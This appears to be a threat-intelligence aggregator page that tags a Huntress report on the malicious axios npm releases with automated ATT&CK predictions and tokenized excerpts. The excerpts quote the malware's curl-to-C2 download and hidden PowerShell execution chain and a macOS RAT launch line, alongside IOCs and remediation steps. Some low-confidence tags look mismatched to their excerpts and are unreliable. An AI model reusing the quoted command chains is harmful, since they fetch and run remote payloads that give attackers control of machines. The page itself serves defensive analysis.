TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Supply Chain Compromise of axios npm Package

2026-03-31 · Read original ↗

ATT&CK techniques detected

31 predictions
T1195.001Compromise Software Dependencies and Development Tools
99%
“##ers and the npm security team could respond. the compromised packages were removed from npm approximately three hours later, but the damage was already done. within our partner base, huntress observed at least 135 endpoints across all operating systems contacting the attacker '…”
T1195.001Compromise Software Dependencies and Development Tools
99%
“, regardless of oidc configuration. the real maintainer later stated in github issue # 10604 : " im trying to get support to understand how this even happened. i have 2fa / mfa on practically everything. " the exact method of token compromise remains undetermined. pre - staging t…”
T1071.001Web Protocols
98%
“##st. github. com / johnhammond / 96575799bd87ae64cddbc55634a6d32d cross - platform rat comparison all three platform variants share an identical c2 protocol and command vocabulary, confirming they originate from the same threat actor and development framework : all variants use …”
T1195.001Compromise Software Dependencies and Development Tools
98%
“##er account ( jasonsaayman ) and manually published two backdoored releases : [ email protected ] ( tagged latest ) and [ email protected ] ( tagged legacy ). these versions introduced a phantom dependency - - [ email protected ]... a package that had not existed before that day…”
T1195.001Compromise Software Dependencies and Development Tools
98%
“to follow the remediation guidance outlined below, including rotating all credentials and rebuilding affected systems, as the rat ' s capabilities for credential theft and data exfiltration mean the full scope of compromise may not be immediately apparent. - - - - - - - - - - - -…”
T1059.001PowerShell
94%
“\ wt. exe → cmd. exe / c curl - s - x post - d " packages. npm. org / product1 " " http : / / sfrclak [. ] com : 8000 / 6202033 " > % temp % \ 6202033. ps1 → % programdata % \ wt. exe - w hidden - ep bypass - file % temp % \ 6202033. ps1 → deletes 6202033. ps1 → deletes 6202033. …”
T1195.001Compromise Software Dependencies and Development Tools
93%
“exe → curl ( post to c2 ) → writes payload → 6202033. ps1 → executes via wt. exe ( hidden, bypass ) → deletes payload at 10 : 38 pm, the soc confirmed the attack was broader than initially appeared. jordan sexton noted one machine appeared to be hit via a yarn datadog package. mi…”
T1059.001PowerShell
92%
“##rclak [. ] com. he identified the persistence mechanism ( microsoftupdate registry key → system. bat ) and noted that one instance had been blocked by defender. at 10 : 00 pm, chad hudson identified the evasion technique : " wt. exe is just windows terminal — being used as a po…”
T1204.002Malicious File
90%
“notably, the calltan [. ] com domain has been linked back to a binary recently used by dprk actors by researchers at volexity. while the exact motivation behind the attack remains unclear, multiple lines of evidence now point to north korean state - sponsored activity. other rese…”
T1195.001Compromise Software Dependencies and Development Tools
88%
“supply chain compromise of axios npm package note : this rapid response article has been written with ai assistance. acknowledgments : special thanks to jevon ang, michael elford, jordan sexton, armelle french, stephanie fairless, juzzy allen, ryan dowd, chad hudson, lindon wass,…”
T1587Develop Capabilities
88%
“: - macos : / library / caches / com. apple. act. mond - windows : % programdata % \ wt. exe, short - lived temp scripts, and the microsoftupdate registry persistence - linux : / tmp / ld. py and related python execution chains - process trees consistent with node → cmd / cscript…”
T1195.001Compromise Software Dependencies and Development Tools
86%
“. 73 on port 8000. immediate remediation - pin to safe versions immediately : - npm install [ email protected ] ( for 1. x users ) - npm install [ email protected ] ( for 0. x users ) - add overrides to prevent transitive resolution : { " overrides " : { " axios " : " 1. 14. 0 " …”
T1587Develop Capabilities
84%
“to follow the remediation guidance outlined below, including rotating all credentials and rebuilding affected systems, as the rat ' s capabilities for credential theft and data exfiltration mean the full scope of compromise may not be immediately apparent. - - - - - - - - - - - -…”
T1195.001Compromise Software Dependencies and Development Tools
83%
“: - macos : / library / caches / com. apple. act. mond - windows : % programdata % \ wt. exe, short - lived temp scripts, and the microsoftupdate registry persistence - linux : / tmp / ld. py and related python execution chains - process trees consistent with node → cmd / cscript…”
T1587Develop Capabilities
80%
“##er account ( jasonsaayman ) and manually published two backdoored releases : [ email protected ] ( tagged latest ) and [ email protected ] ( tagged legacy ). these versions introduced a phantom dependency - - [ email protected ]... a package that had not existed before that day…”
T1587Develop Capabilities
75%
“. 73 on port 8000. immediate remediation - pin to safe versions immediately : - npm install [ email protected ] ( for 1. x users ) - npm install [ email protected ] ( for 0. x users ) - add overrides to prevent transitive resolution : { " overrides " : { " axios " : " 1. 14. 0 " …”
T1553.001Gatekeeper Bypass
73%
“zsh - c " / library / caches / com. apple. act. mond http : / / sfrclak [. ] com : 8000 / 6202033 & " the macos rat is a compiled c + + binary using the nlohmann / json library and libcurl. it provides the same command vocabulary as the windows variant ( kill, peinject, runscript…”
T1587Develop Capabilities
71%
“, regardless of oidc configuration. the real maintainer later stated in github issue # 10604 : " im trying to get support to understand how this even happened. i have 2fa / mfa on practically everything. " the exact method of token compromise remains undetermined. pre - staging t…”
T1204.002Malicious File
71%
“/ df0e06df00e993e7917436d0f73df626 macos tradecraft on macos, the dropper writes an applescript to a temporary file, which uses curl to download a mach - o universal binary ( supporting both x86 _ 64 and arm64 ) from the c2 with the post body packages. npm. org / product0. the bi…”
T1204.002Malicious File
66%
“##e to % programdata % \ wt. exe, then downloads and executes a powershell rat - linux : downloads a python rat script to / tmp / ld. py and executes it after payload delivery, setup. js performs three anti - forensics operations : - deletes itself ( setup. js ) - deletes package…”
T1195.001Compromise Software Dependencies and Development Tools
63%
“. 11. 206. 73 - port : 8000 - clean npm cache : npm cache clean - - force long - term hardening - always commit lockfiles and use npm ci instead of npm install in ci / cd - set npm config set min - release - age 3 to enforce a 48 - 72 hour quarantine on new package versions - use…”
T1587Develop Capabilities
56%
“##ers and the npm security team could respond. the compromised packages were removed from npm approximately three hours later, but the damage was already done. within our partner base, huntress observed at least 135 endpoints across all operating systems contacting the attacker '…”
T1195.002Compromise Software Supply Chain
55%
“supply chain compromise of axios npm package note : this rapid response article has been written with ai assistance. acknowledgments : special thanks to jevon ang, michael elford, jordan sexton, armelle french, stephanie fairless, juzzy allen, ryan dowd, chad hudson, lindon wass,…”
T1587Develop Capabilities
53%
“. 11. 206. 73 - port : 8000 - clean npm cache : npm cache clean - - force long - term hardening - always commit lockfiles and use npm ci instead of npm install in ci / cd - set npm config set min - release - age 3 to enforce a 48 - 72 hour quarantine on new package versions - use…”
T1055.001Dynamic-link Library Injection
53%
“zsh - c " / library / caches / com. apple. act. mond http : / / sfrclak [. ] com : 8000 / 6202033 & " the macos rat is a compiled c + + binary using the nlohmann / json library and libcurl. it provides the same command vocabulary as the windows variant ( kill, peinject, runscript…”
T1195.001Compromise Software Dependencies and Development Tools
49%
“package - lock. json, yarn. lock, pnpm - lock. yaml ) for : - any version of plain - crypto - js 2. check for the malicious dependency directory : ls node _ modules / plain - crypto - js 2 > / dev / null & & echo " potentially affected " the directory presence is sufficient evide…”
T1195Supply Chain Compromise
46%
“supply chain compromise of axios npm package note : this rapid response article has been written with ai assistance. acknowledgments : special thanks to jevon ang, michael elford, jordan sexton, armelle french, stephanie fairless, juzzy allen, ryan dowd, chad hudson, lindon wass,…”
T1557.001Name Resolution Poisoning and SMB Relay
45%
“\ wt. exe → cmd. exe / c curl - s - x post - d " packages. npm. org / product1 " " http : / / sfrclak [. ] com : 8000 / 6202033 " > % temp % \ 6202033. ps1 → % programdata % \ wt. exe - w hidden - ep bypass - file % temp % \ 6202033. ps1 → deletes 6202033. ps1 → deletes 6202033. …”
T1195.002Compromise Software Supply Chain
43%
“##er account ( jasonsaayman ) and manually published two backdoored releases : [ email protected ] ( tagged latest ) and [ email protected ] ( tagged legacy ). these versions introduced a phantom dependency - - [ email protected ]... a package that had not existed before that day…”
T1195.002Compromise Software Supply Chain
39%
“to follow the remediation guidance outlined below, including rotating all credentials and rebuilding affected systems, as the rat ' s capabilities for credential theft and data exfiltration mean the full scope of compromise may not be immediately apparent. - - - - - - - - - - - -…”
T1195.002Compromise Software Supply Chain
37%
“exe → curl ( post to c2 ) → writes payload → 6202033. ps1 → executes via wt. exe ( hidden, bypass ) → deletes payload at 10 : 38 pm, the soc confirmed the attack was broader than initially appeared. jordan sexton noted one machine appeared to be hit via a yarn datadog package. mi…”

Summary

An NPM supply chain attack struck the ubiquitous open-source axios library and Huntress has observed over a hundred affected devices.